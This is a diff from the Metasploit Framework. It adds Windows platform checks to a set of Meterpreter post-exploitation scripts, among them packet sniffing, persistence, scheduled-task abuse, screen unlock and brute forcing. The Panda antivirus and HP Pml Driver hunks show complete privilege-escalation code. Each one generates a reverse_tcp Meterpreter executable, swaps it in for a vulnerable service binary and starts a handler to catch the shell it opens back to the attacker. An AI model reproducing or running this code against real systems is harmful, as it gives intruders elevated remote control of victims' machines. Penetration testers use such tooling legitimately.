srvreclkp(session,dom,dest)
elsif helpcall == nil
print(
"Network Enumerator Meterpreter Script\n" +
"Usage: \n" +
@@exec_opts.usage)
end
if range != nil && pngsp == 1
message(logs)
pingsweep(session,range,dest)
elsif range != nil && rvrslkp == 1
message(logs)
reverselookup(session,range,dest)
elsif dom != nil && hostlist!= nil && frdlkp == 1
message(logs)
frwdlp(session,hostlist,dom,dest)
elsif dom != nil && stdlkp == 1
message(logs)
stdlookup(session,dom,dest)
elsif dom != nil && srvrc == 1
message(logs)
srvreclkp(session,dom,dest)
elsif helpcall == nil
print(
"Network Enumerator Meterpreter Script\n" +
"Usage: \n" +
@@exec_opts.usage)
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

49
scripts/meterpreter/packetrecorder.rb
View File

@ -146,29 +146,34 @@ end
helpcall = 0
intid = 0
background = 0
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
packtime = val
when "-i"
intid = val.to_i
when "-h"
helpmsg
helpcall = 1
end
}
if helpcall == 0
if (user != "NT AUTHORITY\\SYSTEM") && intid != 0
if not checkuac(session)
if client.platform =~ /win32|win64/
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
packtime = val
when "-i"
intid = val.to_i
when "-h"
helpmsg
helpcall = 1
end
}
if helpcall == 0
if (user != "NT AUTHORITY\\SYSTEM") && intid != 0
if not checkuac(session)
startsniff(session,intid)
packetrecord(session,packtime,logfile,intid)
else
print_line("[-] The Meterpreter process is not running as System and UAC is not enable, Insufficient Privileges to run")
end
elsif intid != 0
startsniff(session,intid)
packetrecord(session,packtime,logfile,intid)
else
print_line("[-] The Meterpreter process is not running as System and UAC is not enable, Insufficient Privileges to run")
else
helpmsg
end
elsif intid != 0
startsniff(session,intid)
packetrecord(session,packtime,logfile,intid)
else
helpmsg
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

82
scripts/meterpreter/panda_2007_pavsrv51.rb
View File

@ -49,53 +49,57 @@ opts.parse(args) do |opt, idx, val|
rport = val.to_i
end
end
if client.platform =~ /win32|win64/
client.sys.process.get_processes().each do |m|
client.sys.process.get_processes().each do |m|
if ( m['name'] =~ /PAVSRV51\.EXE/ )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
if ( m['name'] =~ /PAVSRV51\.EXE/ )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
print_status("Done, now just wait for the callback...")
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
# Keep our shell stable.
handler.datastore['InitialAutoRunScript'] = "migrate -f"
handler.datastore['ExitOnSession'] = false
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
print_status("Done, now just wait for the callback...")
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
# Keep our shell stable.
handler.datastore['InitialAutoRunScript'] = "migrate -f"
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
end
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

10
scripts/meterpreter/persistence.rb
View File

@ -4,6 +4,13 @@
# Meterpreter script for installing a persistent meterpreter
#
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
session = client
key = "HKLM"
#
@ -54,7 +61,8 @@ opts.parse(args) do |opt, idx, val|
autoconn = true
end
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
host_name = client.sys.config.sysinfo['Computer']
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")

77
scripts/meterpreter/pml_driver_config.rb
View File

@ -50,52 +50,55 @@ opts.parse(args) do |opt, idx, val|
rport = val.to_i
end
end
if client.platform =~ /win32|win64/
client.sys.process.get_processes().each do |m|
if ( m['name'] =~ /HPZipm12\.exe/ )
client.sys.process.get_processes().each do |m|
if ( m['name'] =~ /HPZipm12\.exe/ )
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
# Build out the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
fd.close
print_status("Stopping service \"Pml Driver HPZ12\"...")
client.sys.process.execute("cmd.exe /c sc stop \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
print_status("Stopping service \"Pml Driver HPZ12\"...")
client.sys.process.execute("cmd.exe /c sc stop \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
print_status("Setting Pml Driver to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
print_status("Restarting the \"Pml Driver HPZ12\" service...")
client.sys.process.execute("cmd.exe /c sc start \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
print_status("Setting Pml Driver to #{tempexe}...")
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= #{tempexe}", nil, {'Hidden' => 'true'})
sleep(1)
print_status("Restarting the \"Pml Driver HPZ12\" service...")
client.sys.process.execute("cmd.exe /c sc start \"Pml Driver HPZ12\" ", nil, {'Hidden' => 'true'})
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['WORKSPACE'] = client.workspace
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
# Our handler to recieve the callback.
handler = client.framework.exploits.create("multi/handler")
handler.datastore['WORKSPACE'] = client.workspace
handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
handler.datastore['LHOST'] = rhost
handler.datastore['LPORT'] = rport
handler.datastore['ExitOnSession'] = false
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
handler.exploit_simple(
'Payload' => handler.datastore['PAYLOAD'],
'RunAsJob' => true
)
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'})
client.sys.process.execute("cmd.exe /c sc config \"Pml Driver HPZ12\" binpath= %SystemRoot%\\system32\\HPZipm12.exe", nil, {'Hidden' => 'true'})
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

11
scripts/meterpreter/prefetchtool.rb
View File

@ -107,6 +107,14 @@ def prefetch_dump(options, logging=false)
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
################## MAIN ##################
options = ""
@ -132,7 +140,8 @@ check_update = false
raise Rex::Script::Completed
end
}
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
prefetch_local = ::File.join(Msf::Config.data_directory, "prefetch.exe")
if !(::File.exist?(prefetch_local))

74
scripts/meterpreter/remotewinenum.rb
View File

@ -140,49 +140,53 @@ def helpmsg
)
end
################## MAIN ##################
if client.platform =~ /win32|win64/
localos = session.sys.config.sysinfo
localos = session.sys.config.sysinfo
# Check that the command is not being ran on a Win2k host
# since wmic is not present in Windows 2000
if localos =~ /(Windows 2000)/
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
else
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
# Check that the command is not being ran on a Win2k host
# since wmic is not present in Windows 2000
if localos =~ /(Windows 2000)/
print_status("This script is not supported to be ran from Windows 2000 servers!!!")
else
# Parsing of Options
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-t"
trg = val
when "-u"
rusr = val
when "-p"
rpass = val
when "-h"
helpmsg
helpcall = 1
end
when "-t"
trg = val
when "-u"
rusr = val
when "-p"
rpass = val
when "-h"
helpmsg
helpcall = 1
end
}
#logfile name
dest = logs + "/" + trg + filenameinfo
# Executing main logic of the script
if helpcall == 0 and trg != ""
}
#logfile name
dest = logs + "/" + trg + filenameinfo
# Executing main logic of the script
if helpcall == 0 and trg != ""
# Making sure that is running as System a Username and Password for target machine must be provided
# Making sure that is running as System a Username and Password for target machine must be provided
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
print_status("Stopped: Running as System and no user provided for connecting to target!!")
print_status("Stopped: Running as System and no user provided for connecting to target!!")
else trg != nil && helpcall != 1
else trg != nil && helpcall != 1
file_local_write(dest,headerbuid(session,trg,dest))
file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))
file_local_write(dest,headerbuid(session,trg,dest))
file_local_write(dest,wmicexec(session,wmic,rusr,rpass,trg))
end
elsif helpcall == 0 and trg == ""
helpmsg
end
end
elsif helpcall == 0 and trg == ""
helpmsg
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

33
scripts/meterpreter/scheduleme.rb
View File

@ -41,7 +41,7 @@ end
def checkuac(session)
uac = false
winversion = session.sys.config.sysinfo
if winversion['OS']=~ /Windows Vista/ or winversion['OS']=~ /Windows 7/
if winversion['OS']=~ /Windows Vista|7/
if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
begin
print_status("Checking if UAC is enabled .....")
@ -256,21 +256,26 @@ password = nil
end
}
if helpcall == 1
usage()
elsif cmd == nil && file == nil
usage()
elsif !checkuac(session)
if file == nil
if remote == 0
scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)
if client.platform =~ /win32|win64/
if helpcall == 1
usage()
elsif cmd == nil && file == nil
usage()
elsif !checkuac(session)
if file == nil
if remote == 0
scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)
else
scheduleremote(session,schtype,cmd,tmmod,cmdopt,targetsys,username,password)
end
else
scheduleremote(session,schtype,cmd,tmmod,cmdopt,targetsys,username,password)
cmd = upload(session,file)
scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)
end
else
cmd = upload(session,file)
scheduleme(session,schtype,cmd,tmmod,cmdopt,username,password)
print_status("Meterpreter is not running under sufficient administrative rights.")
end
else
print_status("Meterpreter is not running under sufficient administrative rights.")
end
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

11
scripts/meterpreter/schtasksabuse.rb
View File

@ -98,6 +98,14 @@ def abuse(session,targets,commands,username,password,delay)
end
end
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
@@exec_opts.parse(args) { |opt, idx, val|
case opt
@ -134,6 +142,9 @@ end
end
}
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
print_status("Meterpreter session running as #{session.sys.config.getuid}")
if help == 0 && commands.length != 0
abuse(session,targets,commands,username,password,delay)

9
scripts/meterpreter/scraper.rb
View File

@ -37,7 +37,10 @@ def m_unlink(session, path)
end
r.close
end
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
# Exec a command and return the results
def m_exec(session, cmd)
begin
@ -45,6 +48,7 @@ def m_exec(session, cmd)
b = ""
while(d = r.channel.read)
b << d
break if d == ""
end
r.channel.close
r.close
@ -73,7 +77,8 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
# Create the log directory
::FileUtils.mkdir_p(logs)
platform = client.platform.scan(/(win32|win64|php)/)
unsupported if not platform
begin
tmp = session.fs.file.expand_path("%TEMP%")

7
scripts/meterpreter/screen_unlock.rb
View File

@ -31,7 +31,12 @@ opts.parse(args) { |opt, idx, val|
raise Rex::Script::Completed
end
}
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
os = client.sys.config.sysinfo['OS']
targets.each do |t|

9
scripts/meterpreter/search_dwld.rb
View File

@ -64,6 +64,15 @@ def scan(path)
}
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
# Get arguments
basedir = args[0] || "C:\\"
filter = args[1] || "office"

7
scripts/meterpreter/srt_webdrive_priv.rb
View File

@ -41,6 +41,13 @@ rport = 4444
sname = 'WebDriveService'
pname = 'wdService.exe'
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
#
# Option parsing
#

8
scripts/meterpreter/uploadexec.rb
View File

@ -78,7 +78,13 @@ def m_unlink(session, path)
end
r.close
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
#parsing of Options
file = ""
cmdopt = nil

7
scripts/meterpreter/virtualbox_sysenter_dos.rb
View File

@ -17,6 +17,13 @@ opts.parse(args) { |opt, idx, val|
end
}
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
# Spawn calculator
pid = client.sys.process.execute("calc.exe", nil, {'Hidden' => 'true'}).pid

7
scripts/meterpreter/vnc.rb
View File

@ -74,6 +74,13 @@ opts.parse(args) do |opt, idx, val|
end
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
#
# Create the raw payload

9
scripts/meterpreter/winbf.rb
View File

@ -139,6 +139,15 @@ def logme(target)
dest
end
#--------------------------------------------------------
#
##check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
################## MAIN ##################
# Parsing of Options

9
scripts/meterpreter/winenum.rb
View File

@ -545,6 +545,15 @@ def uaccheck()
return uac
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
################## MAIN ##################
# Execute Functions selected

9
scripts/meterpreter/wmic.rb
View File

@ -71,6 +71,13 @@ def filewrt(file2wrt, data2wrt)
output.close
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
puts @@exec_opts.usage
@ -120,6 +127,8 @@ end
raise RuntimeError, "Empty command list"
end
}
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
if outfile == nil
print_status wmicexec(session,commands)